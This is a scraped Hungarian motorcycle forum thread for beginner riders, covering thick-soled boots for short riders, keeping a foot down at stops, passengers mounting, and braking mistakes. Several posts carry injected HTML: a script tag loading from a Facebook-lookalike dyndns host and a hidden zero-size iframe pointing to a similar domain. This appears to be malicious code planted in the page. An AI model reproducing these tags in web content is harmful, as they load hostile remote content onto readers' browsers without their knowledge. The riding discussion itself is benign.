Street Racer STR motoros kesztyű a MotoZemtől

Kezdő motorosok topicja

Akkor nyújtsd át a kulcsot nemtáviratnak ;) Megnyugszik a lelke is meg nem jön ki a gyakorlatból se amíg nem lesz saját vas ;)


Hoooogyne ! Ezt ár ismerjük ! Aztán elfelejti visszanyújtani, utána meg megy a nyavalygás, hogy ugye nem akartál azzal menni, mert akkor én elviszem, ... :heureka:
 
Hoooogyne ! Ezt ár ismerjük ! Aztán elfelejti visszanyújtani, utána meg megy a nyavalygás, hogy ugye nem akartál azzal menni, mert akkor én elviszem, ... :heureka:

Én lelkesen szoktam ajánlgatni, de sose szokott élni vele :D Lehet a 600-a után kicsi, meg neki öreg, büdös, rossz... Úgyhogy nekem nincs ilyen gondom :D
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Lehet hülyeséget kérdezek, de szerintetek mennyire lehet vastag talpú cipőben motorozni, váltót, féket kezelni? A gyakorló motorhoz kicsinek bizonyulok, éppen a cipő orrát tudom letenni :(ami kicsit megnehezíti a dolgomat. Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak. Mivel a többség, aki A kategóriára jön, mind szép szál férfi méret :) csak néhány fiú és leányzó van, akinek a mérte ellenére elment az esze :D Jóból kicsit adnak ... a 165cm pedig úgy tűnik most kicsi.
 
Ha a saját motorod lenne, azt mondanám, próbáld ki, de így szerintem nem lennél előrébb. Mégpedig azért, mert a vastagabb talp miatt nem csak, hogy kevésbé érzed majd a lábféket, de biztos, hogy állítani kellene a váltókaron, hogy beférjen alá a lábfejed. Kérdés, hogy mire hajlandóak inkább, pár centit lecsalni a magasságból (ami amúgy mindenkinek jó, mert stabilabban áll a lábán), vagy állítani a váltókaron, ami miatt a többségnek esetleg majd el kell emelnie a lábát a lábtartóról, hogy váltani tudjon...
Ha könnyen hozzáférhető a hátsó rugóelőfeszítés-állítás a motoron, és főleg, ha fokozatonként állítható, inkább azt kellene megpróbálni kisebbre venni, a miatt is jobban összeül a motor terhelve.
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>
Ha a saját motorod lenne, azt mondanám, próbáld ki, de így szerintem nem lennél előrébb. Mégpedig azért, mert a vastagabb talp miatt nem csak, hogy kevésbé érzed majd a lábféket, de biztos, hogy állítani kellene a váltókaron, hogy beférjen alá a lábfejed. Kérdés, hogy mire hajlandóak inkább, pár centit lecsalni a magasságból (ami amúgy mindenkinek jó, mert stabilabban áll a lábán), vagy állítani a váltókaron, ami miatt a többségnek esetleg majd el kell emelnie a lábát a lábtartóról, hogy váltani tudjon...
Ha könnyen hozzáférhető a hátsó rugóelőfeszítés-állítás a motoron, és főleg, ha fokozatonként állítható, inkább azt kellene megpróbálni kisebbre venni, a miatt is jobban összeül a motor terhelve.
Köszönöm! Akkor marad az eddig jól bevált bakancs és a kevésbé stabil állás :) De erre a rugó állítós dologra azért rákérdezek az oktatónál, hátha ;)
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe> Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak.

A hagyományos motoros csizmák talpa csak kicsit vastagabb, mint egy sima utcai cipő, és semmiképpen nem vastagabb, mint egy sima bakancs. Ha vastag a csizma talpa, az valóban zavaró a váltásnál és fékezésnél.
A motoros csizmánál értelemszerűen nem a talp védelme a legfontosabb, hanem a boka és a sípcsont környéke, így nem kell extra vastag talp.
 
akkor ez volt a baj! az utasom rögtön a haladó szinttel kezdte, a lábtartóra állva szállt fel. :)
Nem is az oldalsztender felé billenéssel volt a gond, hanem a másik oldallal, mikor átlendítette magát.

Ez a "haladó" szint a vezetőnek a legrosszabb. Meg kell értetni az utassal, hogy ne akarja kibillenteni a motort felszállás közben a túl egyoldalas terheléssel. Ha alacsony a motor, akkor a lábát az ülésen átlendítve egyből közel egyenesen ülő helyzetben el tud helyezkedni egyből.
 
Ez a "haladó" szint a vezetőnek a legrosszabb. Meg kell értetni az utassal, hogy ne akarja kibillenteni a motort felszállás közben a túl egyoldalas terheléssel. Ha alacsony a motor, akkor a lábát az ülésen átlendítve egyből közel egyenesen ülő helyzetben el tud helyezkedni egyből.
igen, ezért (is) volt jó utasom a csamszülinapon: a hátsó ülésről is leért a lába. :D
viszont akárhogy próbálta összehúzni magát, ugyanúgy érte szegényt a huzat, mintha ott se ültem volna előtte. hiába, aki törpe sofőrt választ magának... :D
 
igen, ezért (is) volt jó utasom a csamszülinapon: a hátsó ülésről is leért a lába. :D
viszont akárhogy próbálta összehúzni magát, ugyanúgy érte szegényt a huzat, mintha ott se ültem volna előtte. hiába, aki törpe sofőrt választ magának... :D
letojtam a huzatot, örültem, hogy vittél magaddal:D
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" width="0" height="0"></iframe>Lehet hülyeséget kérdezek, de szerintetek mennyire lehet vastag talpú cipőben motorozni, váltót, féket kezelni? A gyakorló motorhoz kicsinek bizonyulok, éppen a cipő orrát tudom letenni :(ami kicsit megnehezíti a dolgomat. Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak. Mivel a többség, aki A kategóriára jön, mind szép szál férfi méret :) csak néhány fiú és leányzó van, akinek a mérte ellenére elment az esze :D Jóból kicsit adnak ... a 165cm pedig úgy tűnik most kicsi.

Nálunk volt egy csaj a rutinpályán, akinek vagy 2 számmal nagyobb csizmája volt, kitömte az elejét papírzsepivel, és így tudta letenni a csizma orrát...:)ilyesmivel is lehet próbálkozni:cool:
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>
Nálunk volt egy csaj a rutinpályán, akinek vagy 2 számmal nagyobb csizmája volt, kitömte az elejét papírzsepivel, és így tudta letenni a csizma orrát...:)ilyesmivel is lehet próbálkozni:cool:
Ez jó, gondolom stabilan állt a zsepin :Dtiszta balett óra. Tartsuk meg a 240kg-os vasat lábujjhegyen;)Na de úgyse adom fel, ez is csak egy akadály, amivel meg kell birkózni. Nőni nem fogok már, ez tuti, így marad a pipiskedés.
 
Láttam már patatalpú cipővel kisnövésű leányzót busával, azt mondta nem nagy a különbség, csak meg kell szokni a vastag talpat.... mondta ezt ő 6 évnyi motoros gyakorlattal a háta mögött.
 
A mai nap tanulságai:
a., amíg nem tanulok meg közlekedni, felvezetőmotor nélkül nem megyek idegen helyre, vagy legalábbis nem forgalmas úton. Ön-és közveszélyes voltam ma Csepelen.
b., meg kéne ismerkedni közelebbről a fékekkel, az nem állapot, hogy vészfékezés címén csúszkálok össze-vissza az úton, miközben az előttem álló autó rohamosan növekvő seggét bámulom. (de végül megálltam)
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>
Ez jó, gondolom stabilan állt a zsepin :Dtiszta balett óra. Tartsuk meg a 240kg-os vasat lábujjhegyen;)Na de úgyse adom fel, ez is csak egy akadály, amivel meg kell birkózni. Nőni nem fogok már, ez tuti, így marad a pipiskedés.

Egy apró kis trükk, ami nekem segített: meg sem próbáltam soha mindkét lábamat letenni, mert az úgyse ment, vagyis csak balerinaspiccben. Egyik láb marad a lábtartón, másikat le, kicsit oldalra csúszva. Csak lehetőleg a jobb lábat kell lerakni, bár én olyan villámgyorsan csúszkáltam jobbra-balra az ülésen, hogy nem volt gond hogy automatikusan a balt tettem le mindig. Telitalp így se jött össze, de a lábujjhegy bőven.
 
Kaptam egy frankó hírlevelet a kanyarvételi technikákról. Ide nem fér be, mert képekkel illusztrált, de szívesen továbbküldöm annak, akit érdekel. Priviben e-mail címet kérek.
 
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Lehet hülyeséget kérdezek, de szerintetek mennyire lehet vastag talpú cipőben motorozni, váltót, féket kezelni? A gyakorló motorhoz kicsinek bizonyulok, éppen a cipő orrát tudom letenni :(ami kicsit megnehezíti a dolgomat. Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak. Mivel a többség, aki A kategóriára jön, mind szép szál férfi méret :) csak néhány fiú és leányzó van, akinek a mérte ellenére elment az esze :D Jóból kicsit adnak ... a 165cm pedig úgy tűnik most kicsi.

Akkor én mit szóljak meg a Drágám az 160-al? :D
De én tudom a megoldást, csak egy baj van, hogy drága. A Daytona gyárt egy csizmát, nőknek is kisebb méretben akár, ami kicsit magasabb talpú és kapaszkodjatok meg, de saját 2 centivel megemelt talpbetétje van. (van férfiben is :)) A Drága fel is próbált egyet és magasabb lett nálam :D Na a baj vele, hogy hiperszuperk márkás, goretex és lemész tőle hídba. Meg az árától is, ami 95 e magyar huf... De legalább már van megoldás és még van egy überfasza csizmád is, ami jópár évet kibír... Nekem jó a lapos sidim...

Amúgy meg egyik lábas kiülős módszer a jó, csak baromi veszélyes, mert picit kibillen a motor az egyensúlyából és megvan a baj (tapasztalat). Amúgy milyen mocin tanulsz? Mert nem akarom elhinni, hogy a 165 centiddel gondod van. Nekem mindig 5 centi hiányzik, de az a lábamba :D
 

Legújabb blogbejegyzések

CsamShop kendők

Back
Oldal tetejére